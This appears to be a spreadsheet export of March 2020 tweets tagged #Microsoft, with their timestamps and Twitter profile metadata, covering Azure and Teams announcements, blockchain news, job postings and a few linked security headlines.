    <t>{'id': 1918756567, 'id_str': '1918756567', 'name': 'Daydream Soliloquy', 'screen_name': 'breathtovision', 'location': 'We are everywhere', 'description': 'Senior Account Manager | Bing Maps Inside Sales (Epic EMR | Asset and Fleet Management | CRM | Internal and Public Website Utilization)', 'url': 'https://t.co/GdZNxgpaBf', 'entities': {'url': {'urls': [{'url': 'https://t.co/GdZNxgpaBf', 'expanded_url': 'http://adamewilliams.com', 'display_url': 'adamewilliams.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 695, 'friends_count': 444, 'listed_count': 9, 'created_at': 'Mon Sep 30 02:34:58 +0000 2013', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3372,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'http://pbs.twimg.com/profile_images/757852679292858368/ZwmlXutM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/757852679292858368/ZwmlXutM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1918756567/1380953749',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</si>
  <si>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17:51:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will soon enable Scheduled meetings and Meeting recordings for free edition of Teams  #microsoft #teams #meetings #online #video #free #coronavirus | #RoadmapforSuccess https://t.co/pscRf8x3Kw</t>
  </si>
  <si>
    <t>{'id': 2918029454, 'id_str': '2918029454', 'name': 'Adam E. Williams | #RoadmapforSuccess', 'screen_name': 'KickstandWilly', 'location': 'The Pacific Northwest', 'description': 'Leader. Visionary Strategist. Incisive Tactician. Entrepreneur. Old World Dreamer. New World Geek.', 'url': 'https://t.co/x15yMmuE6g', 'entities': {'url': {'urls': [{'url': 'https://t.co/x15yMmuE6g', 'expanded_url': 'http://AdamEWilliams.com', 'display_url': 'AdamEWilliams.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1308, 'friends_count': 1541, 'listed_count': 45, 'created_at': 'Wed Dec 03 23:51:27 +0000 2014', 'favourites_count': 219, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3542,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'http://pbs.twimg.com/profile_images/1212715935527665664/mOvKLoal_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212715935527665664/mOvKLoal_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2918029454/1463015655',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</si>
  <si>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17:49:50 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/jwtU0OrDDq, the open source leader in AI and machine learning, today announced that it has been named to CB Insights fourth annual AI 100 ranking, showca #microsoft https://t.co/zgKGZ2iSML https://t.co/oZJEc9W2cq</t>
  </si>
  <si>
    <t>Wed Mar 04 17:48:22 +0000 2020</t>
  </si>
  <si>
    <t>I have been studying for #MS-500 #certification #exam. It's amazing how #Microsoft has developed their capabilities in Enterprise cyber security. Integration between the products and capabilities is the biggest thing to get Zero-trust implemented. @msftsecurity @MsftSecIntel</t>
  </si>
  <si>
    <t>{'id': 4194479483, 'id_str': '4194479483', 'name': 'Joonas Pakkanen', 'screen_name': 'PakkanenJoonas', 'location': 'Helsinki, Suomi', 'description': '#Digital #Transformation #Azure #Microsoft365. Always trying to find new stuff to learn. People-centric approach for everything. Proud dad, nature lover.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 124, 'friends_count': 583, 'listed_count': 20, 'created_at': 'Sun Nov 15 14:22:29 +0000 2015', 'favourites_count': 1079, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5220,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'http://pbs.twimg.com/profile_images/1164058235319590913/TzQTaye4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1164058235319590913/TzQTaye4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4194479483/1566368206',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</si>
  <si>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17:46:25 +0000 2020</t>
  </si>
  <si>
    <t>We are full of bright ideas and that includes using Microsoft 365 Tools. While we are agnostic in technology, we do love using Microsoft Tools among our teams and have set up MS tools for our clients. Learn more here:  https://t.co/8AoHlTs3RS #Microsoft #tech #SanAntonio https://t.co/9ftODyyyUi</t>
  </si>
  <si>
    <t>{'id': 28591374, 'id_str': '28591374', 'name': 'Webhead', 'screen_name': 'webheadsa', 'location': 'San Antonio, TX', 'description': 'We specialize in Web &amp; Software Dev &amp; Engineering, Information Security, Program Management, Help Desk Support &amp; IT Talent Acquisition.', 'url': 'https://t.co/lIB0AUCXCP', 'entities': {'url': {'urls': [{'url': 'https://t.co/lIB0AUCXCP', 'expanded_url': 'https://webheaddigital.com/', 'display_url': 'webheaddigital.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 771, 'friends_count': 908, 'listed_count': 66, 'created_at': 'Fri Apr 03 15:59:00 +0000 2009', 'favourites_count': 3617, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2262,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'http://pbs.twimg.com/profile_images/1080494835646091264/8wzybNgR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1080494835646091264/8wzybNgR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28591374/1578364658',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</si>
  <si>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17:45:57 +0000 2020</t>
  </si>
  <si>
    <t>"The Baseline Protocol has already brought together more than a dozen companies and organizations that will form its technical steering committee (TSC), including #ConsenSys, #EY, #Microsoft, #AMD, #ChainLink, #CoreConvergence, .....(1/2)</t>
  </si>
  <si>
    <t>{'id': 951708574056579072, 'id_str': '951708574056579072', 'name': 'â¬¡LinkFatherâ¬¡', 'screen_name': 'LinkFather', 'location': '', 'description': "â¬¡Issue:\xa0blockchains don't have access to off-chain and reliable data.ðŸ¦†ðŸ¦†ðŸ¦†\nâ¬¡ Solution: #Chainlink\n#4IR #DeFi $LINK #Oracle", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3282, 'friends_count': 3348, 'listed_count': 10, 'created_at': 'Fri Jan 12 06:53:00 +0000 2018', 'favourites_count': 4644, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3147,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'http://pbs.twimg.com/profile_images/1222640613776076801/xXRZmarc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222640613776076801/xXRZmarc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/951708574056579072/1577356542',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</si>
  <si>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17:45:34 +0000 2020</t>
  </si>
  <si>
    <t>Hybrid Azure AD Join com Intune
#Intune #AzureAD #Microsoft
https://t.co/WxP9AUDNYz</t>
  </si>
  <si>
    <t>{'id': 89463505, 'id_str': '89463505', 'name': 'Thomas Cezario', 'screen_name': 'cezariothomas', 'location': 'Brasil - SÃ£o Paulo', 'description': 'MCSA Office 365 | MCSA W2K12 | MCSE Cloud Platform and Infrastructure | MCP', 'url': 'https://t.co/swsnYCFRsE', 'entities': {'url': {'urls': [{'url': 'https://t.co/swsnYCFRsE', 'expanded_url': 'http://tcezario.wordpress.com', 'display_url': 'tcezario.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 350, 'friends_count': 776, 'listed_count': 5, 'created_at': 'Thu Nov 12 15:00:36 +0000 2009', 'favourites_count': 3050, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 757,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'http://pbs.twimg.com/profile_images/1234286481117765632/y9-mxsIi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234286481117765632/y9-mxsIi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/89463505/1522499360',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</si>
  <si>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Wed Mar 04 17:45:13 +0000 2020</t>
  </si>
  <si>
    <t>Are you an IT Manager in the Philly area: leading teams for IT Infrastructure (server storage backup Microsoft Linux)?
See new opportunity https://t.co/zz4SxL3Bwa
#jobsoftheweek #thetrevigroup #itmanager #phillyjobs #linuxserver #microsoft #backupsolutions #storagesystems</t>
  </si>
  <si>
    <t>{'id': 12151842, 'id_str': '12151842', 'name': 'Karel Lukas', 'screen_name': 'KarelLukas', 'location': 'Nashville, TN (USA)', 'description': 'Executive Recruiter @ THE TREVI GROUP: IT Leadership, Network &amp; IT Systems Engineers, Network, Cloud, Security, DevOps, Data Center, Collaboration.', 'url': 'https://t.co/RDjHGS6MB3', 'entities': {'url': {'urls': [{'url': 'https://t.co/RDjHGS6MB3', 'expanded_url': 'http://www.TheTreviGroup.com', 'display_url': 'TheTreviGroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 565, 'friends_count': 640, 'listed_count': 42, 'created_at': 'Sat Jan 12 13:23:14 +0000 2008', 'favourites_count': 300, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 16785,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'http://pbs.twimg.com/profile_images/181040646/KL-pix2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/181040646/KL-pix2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/12151842/1438527192', 'profile_link_color': '0000FF', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EFECEB', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:45:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Exchange 2019 15.2.221.12 #Remote Code Execution https://t.co/rxLWpao8lc #CXSECurity</t>
  </si>
  <si>
    <t>Wed Mar 04 17:45:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft teases new #Windows10 Start menu that de-emphasizes Live Tiles.
https://t.co/2znM31dADH via @pcworld</t>
  </si>
  <si>
    <t>{'id': 43219550, 'id_str': '43219550', 'name': 'Investintech.com', 'screen_name': 'able2extract', 'location': 'Toronto, Ontario', 'description': 'Powerful PDF Solutions for organizations, developers, and users of all levels.', 'url': 'https://t.co/eZjTTX97aw', 'entities': {'url': {'urls': [{'url': 'https://t.co/eZjTTX97aw', 'expanded_url': 'https://www.investintech.com/', 'display_url': 'investintech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2697, 'friends_count': 1363, 'listed_count': 187, 'created_at': 'Thu May 28 23:02:55 +0000 2009', 'favourites_count': 1210, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6400, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '6096BA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/807327786100752384/Rz3_8mdP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/807327786100752384/Rz3_8mdP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43219550/1575285662', 'profile_link_color': '1155A8',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</si>
  <si>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17:44:33 +0000 2020</t>
  </si>
  <si>
    <t>EY and ConsenSys form Baseline Protocol initiative to make Ethereum stronger for enterprises https://t.co/GipDABDIY9 #NetworksProtocols #Consensys #Microsoft #EY</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</si>
  <si>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8203, 'friends_count': 8945, 'listed_count': 38, 'created_at': 'Tue Nov 06 20:50:01 +0000 2018', 'favourites_count': 328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 139711,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</si>
  <si>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17:44:01 +0000 2020</t>
  </si>
  <si>
    <t>Responsible #AI, the #Microsoft way - Nick Patience https://t.co/8wKFq351ja</t>
  </si>
  <si>
    <t>{'id': 226390248, 'id_str': '226390248', 'name': 'Don Reamey', 'screen_name': 'DonReamey', 'location': 'Redmond, WA', 'description': 'Software Engineer @Microsoft in @Azure - AI Training Services', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1706, 'friends_count': 919, 'listed_count': 100, 'created_at': 'Tue Dec 14 01:49:35 +0000 2010', 'favourites_count': 371, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3804,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'http://pbs.twimg.com/profile_images/693139601716711424/yPC71a-9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/693139601716711424/yPC71a-9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/226390248/1479237854',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</si>
  <si>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17:42:54 +0000 2020</t>
  </si>
  <si>
    <t>#ConsenSys and #EY have announced the formation of #Baseline #Protocol, a #project aimed at enterprises. The #project has garnered support from 12 other companies and organizations, including #Microsoft, #AMD, #ChainLink, and #MakerDAO.
https://t.co/xoEtPzaPGT
#Rakamoto #Coin</t>
  </si>
  <si>
    <t>{'id': 273337477, 'id_str': '273337477', 'name': 'Blockchain News', 'screen_name': 'Rakamoto', 'location': 'Worldwide', 'description': 'Latest News for #Blockchain #Bitcoin #Crypto #Cryptocurrency #Coin #StableCoin #Libra #dApps #Wallet #Decentralization #BTC #BTD #ETH #Money #Rakamoto @Rakamoto', 'url': 'https://t.co/QA9NdCKhUG', 'entities': {'url': {'urls': [{'url': 'https://t.co/QA9NdCKhUG', 'expanded_url': 'https://www.Rakamoto.com', 'display_url': 'Rakamoto.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21942, 'friends_count': 332, 'listed_count': 33, 'created_at': 'Mon Mar 28 09:00:37 +0000 2011', 'favourites_count': 274, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 35866,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'http://pbs.twimg.com/profile_images/1195578687887937536/nid1EKSL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195578687887937536/nid1EKSL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/273337477/1572134919',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</si>
  <si>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17:42:04 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft, #ey and #consensys to make public #ethereum #blockchain safe for enterprises. #crypto #cryptocurrency #cryptocurrencies #CryptoMarkets #blockchaintechnology https://t.co/yez7v3pBg5</t>
  </si>
  <si>
    <t>{'id': 739902898943954945, 'id_str': '739902898943954945', 'name': 'John Bednarski', 'screen_name': 'john_bednarski', 'location': 'Chicago, IL', 'description': 'CEO S.O.A. and Project Adviser Saga Bok, Norway', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 339, 'friends_count': 184, 'listed_count': 7, 'created_at': 'Mon Jun 06 19:32:52 +0000 2016', 'favourites_count': 3767, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6946, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/942102382770622464/eZYsolXk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/942102382770622464/eZYsolXk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/739902898943954945/1479513839',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</si>
  <si>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17:41:46 +0000 2020</t>
  </si>
  <si>
    <t>Put simply, users visiting a genuine Microsoft web domain might actually be on a #subdomain controlled by an #attacker.
#cybersecurity #dns #securitynews #Microsoft 
https://t.co/Qj0B8U4n1j</t>
  </si>
  <si>
    <t>{'id': 1126124402435862528, 'id_str': '1126124402435862528', 'name': 'Johnny', 'screen_name': 'Jorune00', 'location': 'Chicago Metropolitan Area', 'description': 'ðŸ‡ºðŸ‡¸ðŸŒ\nNetwork Engineer that specializes on #security, #telephony, #technology, and more.  Other hobbies: #weather enthusiast, #astrophotography, and #cats.', 'url': 'https://t.co/IX1xOHNHVH', 'entities': {'url': {'urls': [{'url': 'https://t.co/IX1xOHNHVH', 'expanded_url': 'https://www.linkedin.com/in/johnnyheintz/', 'display_url': 'linkedin.com/in/johnnyheintâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 82, 'listed_count': 1, 'created_at': 'Wed May 08 13:59:14 +0000 2019', 'favourites_count': 174, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 178, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1126124527048695809/gAuRXU44_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126124527048695809/gAuRXU44_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1126124402435862528/1579534517',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</si>
  <si>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17:41:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Cosmos DB free tier is now available https://t.co/Swq8uLy3iA</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: New features in Azure Cosmos DB Jupyter notebooks are now in preview https://t.co/CZHQ9zTt0b</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: PowerShell 7.0 is now generally available https://t.co/qdYJ2IiA9c</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Backup Reports is now in preview https://t.co/JKOhKIUpV5</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Active Directory for authentication on SMB access to Azure File in preview https://t.co/LweBIigkGK</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Updates to Azure HDInsight https://t.co/ba2u5w9iiF</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure DevTest LabsSecurity alerts for lab environments https://t.co/2A4vRLKTeD</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities https://t.co/rnmIf4oBEf</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Virtual machine scale sets now simpler to manage https://t.co/sqsbr9zayW</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure FunctionsSupport for custom language workers over HTTP is now in preview https://t.co/4nOdfIrMto</t>
  </si>
  <si>
    <t>Wed Mar 04 17:40:55 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Office365, businesses of all sizes can work anywhere together, work easier and worry less. Davyn's #Cloud team members are always available to demo Office 365 to your #Business at any time. Upgrade today along with #Windows10! https://t.co/se5sSQcyRb
#DavynTT https://t.co/SgTDGUMyYu</t>
  </si>
  <si>
    <t>{'id': 169089942, 'id_str': '169089942', 'name': 'Davyn Limited', 'screen_name': 'DavynTT', 'location': 'Trinidad and Tobago', 'description': 'Microsoft Certified Partner specializing in Dynamics ERP and CRM', 'url': 'http://t.co/SeOrfzZ3d4', 'entities': {'url': {'urls': [{'url': 'http://t.co/SeOrfzZ3d4', 'expanded_url': 'http://www.davyntt.com', 'display_url': 'davyntt.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 275, 'friends_count': 505, 'listed_count': 27, 'created_at': 'Wed Jul 21 14:33:28 +0000 2010', 'favourites_count': 977, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8500, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00589C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/540486508516356097/7cn-XiVR_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/540486508516356097/7cn-XiVR_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/169089942/1573750283', 'profile_link_color': '3B94D9',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</si>
  <si>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Never, ever update a Mac with their new system. Just updated &amp;amp; its wiped out my old Microsoft word &amp;amp; excel. I will now have to repurchase them if I wish to use them again #apple #applemac #Microsoft365 #microsoft</t>
  </si>
  <si>
    <t>{'id': 347126368, 'id_str': '347126368', 'name': '............!!', 'screen_name': 'AndyBulleyment', 'location': 'A house.', 'description': 'Yep......just what I thought...!\n#lufc', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 149, 'listed_count': 0, 'created_at': 'Tue Aug 02 09:37:20 +0000 2011', 'favourites_count': 1593, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3379,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'http://pbs.twimg.com/profile_images/882737429979029505/SBg4BQN-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/882737429979029505/SBg4BQN-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/347126368/1499295980',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</si>
  <si>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17:40:53 +0000 2020</t>
  </si>
  <si>
    <t>From March 10 #Microsoft will start offering #MicrosoftTeams enterprise #teleconference features on the free tier to help folks avoid spreading #coronavirus and #work #remote https://t.co/qhA1sDReSe</t>
  </si>
  <si>
    <t>Wed Mar 04 17:40:25 +0000 2020</t>
  </si>
  <si>
    <t>Sudden, irrational urge to buy a second-hand, eight-year-old, discontinued #Microsoft #Zune"in Bowel Brown please!" https://t.co/C7QXiEaYZj</t>
  </si>
  <si>
    <t>{'id': 2282983818, 'id_str': '2282983818', 'name': 'Stanley Q Woodvine', 'screen_name': 'sqwabb', 'location': 'Vancouver, B.C. Canada', 'description': 'Currently homeless. Formerly not. Used to draw pictures &amp; stuff for a living. Now I collect refundable containersâ€”weird huh? email: sqwabb@gmail.com', 'url': 'http://t.co/fVwVTuQU5k', 'entities': {'url': {'urls': [{'url': 'http://t.co/fVwVTuQU5k', 'expanded_url': 'http://sqwabb.wordpress.com/', 'display_url': 'sqwabb.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2029, 'friends_count': 89, 'listed_count': 98, 'created_at': 'Thu Jan 09 03:34:40 +0000 2014', 'favourites_count': 11572, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15964,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'http://pbs.twimg.com/profile_images/651628755836796928/WZ9Gjhle_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/651628755836796928/WZ9Gjhle_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2282983818/1412881211',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</si>
  <si>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17:40:20 +0000 2020</t>
  </si>
  <si>
    <t>She got the perfect body for a
https://t.co/SycnNzaie2
#Fremont
 #microsoft #earrings https://t.co/UpbRphP2S6</t>
  </si>
  <si>
    <t>{'id': 1233813867790307328, 'id_str': '1233813867790307328', 'name': 'Millicent Seino', 'screen_name': 'ndiceserdis', 'location': 'Buffalo, USA', 'description': 'Our Relationship is meant to be. Something that was written in the stars and drawn into our destiny.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Sat Feb 29 17:58:49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'http://pbs.twimg.com/profile_images/1234002187543556096/2rEiVQuQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234002187543556096/2rEiVQuQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233813867790307328/1583014189',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</si>
  <si>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17:40:12 +0000 2020</t>
  </si>
  <si>
    <t>By increasing the value of managers &amp;amp; employees at all levels, human intelligence can maximize benefits of artificial intelligence. Tonight's Microsoft Keynote @ https://t.co/MeqOIduYwP #CEO #leadershipdevelopment #agapemodel #Microsoft #PMI https://t.co/yTyqFBvDwR</t>
  </si>
  <si>
    <t>{'id': 594670419, 'id_str': '594670419', 'name': 'Anthony Ally', 'screen_name': 'CXOAlliance', 'location': 'Texas', 'description': 'Breakthrough Strategist to increase personal &amp; corporate performance while increasing capacity for stress.', 'url': 'http://t.co/ub5x38ICwp', 'entities': {'url': {'urls': [{'url': 'http://t.co/ub5x38ICwp', 'expanded_url': 'http://www.anthonyally.com', 'display_url': 'anthonyally.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 94, 'friends_count': 360, 'listed_count': 5, 'created_at': 'Wed May 30 13:17:51 +0000 2012', 'favourites_count': 92, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 470, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '470303', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/478644030788485120/6QhjiHeX_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/478644030788485120/6QhjiHeX_normal.png', 'profile_link_color': '470303', 'profile_sidebar_border_color': '21161C', 'profile_sidebar_fill_color': '4F1D39', 'profile_text_color': '91264D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:40:03 +0000 2020</t>
  </si>
  <si>
    <t>#Linux and #OpenSource are in #business by #Microsoft https://t.co/4ltCky5jNi #ElectroOptics</t>
  </si>
  <si>
    <t>Wed Mar 04 17:39:47 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Windows Explorer Used by Mailto Ransomware to Evade Detection:" https://t.co/ByRJDNFGJ1
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 17:39:21 +0000 2020</t>
  </si>
  <si>
    <t>Excited to welcome #postgresql committers to #MicrosoftAzure and @AzureDBPostgres.  Welcome to #Microsoft @AndresFreundTec, @MengTangmu, and Jeff!
https://t.co/o73LUwTSoP</t>
  </si>
  <si>
    <t>{'id': 32829080, 'id_str': '32829080', 'name': 'Sudhakar Sannakkayala', 'screen_name': 'sudhakars', 'location': 'Redmond, WA', 'description': 'Leading the engineering teams for Azure Database for PostgreSQL, MySQL, MariaDB and Azure Database Migration Service', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 210, 'friends_count': 378, 'listed_count': 5, 'created_at': 'Sat Apr 18 07:56:59 +0000 2009', 'favourites_count': 304, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 732,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'http://pbs.twimg.com/profile_images/643668730245836800/f8Q8t9tj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/643668730245836800/f8Q8t9tj_normal.jpg', 'profile_link_color': '4A913C',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</si>
  <si>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17:39:08 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports: https://t.co/nX6jn8mgGk #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:38:48 +0000 2020</t>
  </si>
  <si>
    <t>New features in Azure Cosmos DB Jupyter notebooks are now in preview https://t.co/JCvb6Jsgcj  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Azure Cosmos DB free tier is now available https://t.co/WmWTQgk2U5  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Active Directory for authentication on SMB access to Azure File in preview https://t.co/LZtULFnNiM  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Backup Reports is now in preview https://t.co/4hZWg0jJfN  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities https://t.co/Mt6Ya1jmgZ  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Azure FunctionsSupport for custom language workers over HTTP is now in preview https://t.co/2crT71qucI  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Updates to Azure HDInsight https://t.co/GM9OiieEDF  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Virtual machine scale sets now simpler to manage https://t.co/L9MfFIxD8U  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>PowerShell 7.0 is now generally available https://t.co/yh8bZOdGYi  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Wed Mar 04 17:38:21 +0000 2020</t>
  </si>
  <si>
    <t>The Brokers at GSIMarkets whould like to inform you that: Microsoft Corp (MSFT) stock rose by 1.1861%! Currently priced at 166.4613. https://t.co/TmbeSjmU8x #Microsoft #MSFT #Stocks #Stockprices #GSIMarkets</t>
  </si>
  <si>
    <t>{'id': 724577059159314432, 'id_str': '724577059159314432', 'name': 'GSI Markets', 'screen_name': 'gsimarkets', 'location': 'London, England', 'description': 'GSI Markets Brokerage offers the highest quality of service, security of funds, latest technologies and deep liquidity. Follow us for news &amp; more.', 'url': 'https://t.co/cZmqeP98ud', 'entities': {'url': {'urls': [{'url': 'https://t.co/cZmqeP98ud', 'expanded_url': 'https://www.gsimarkets.com/Company', 'display_url': 'gsimarkets.com/Company', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 550, 'friends_count': 88, 'listed_count': 14, 'created_at': 'Mon Apr 25 12:33:27 +0000 2016', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6009,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'http://pbs.twimg.com/profile_images/798156486170079232/mTgHPeWg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/798156486170079232/mTgHPeWg_normal.jpg', 'profile_banner_url': 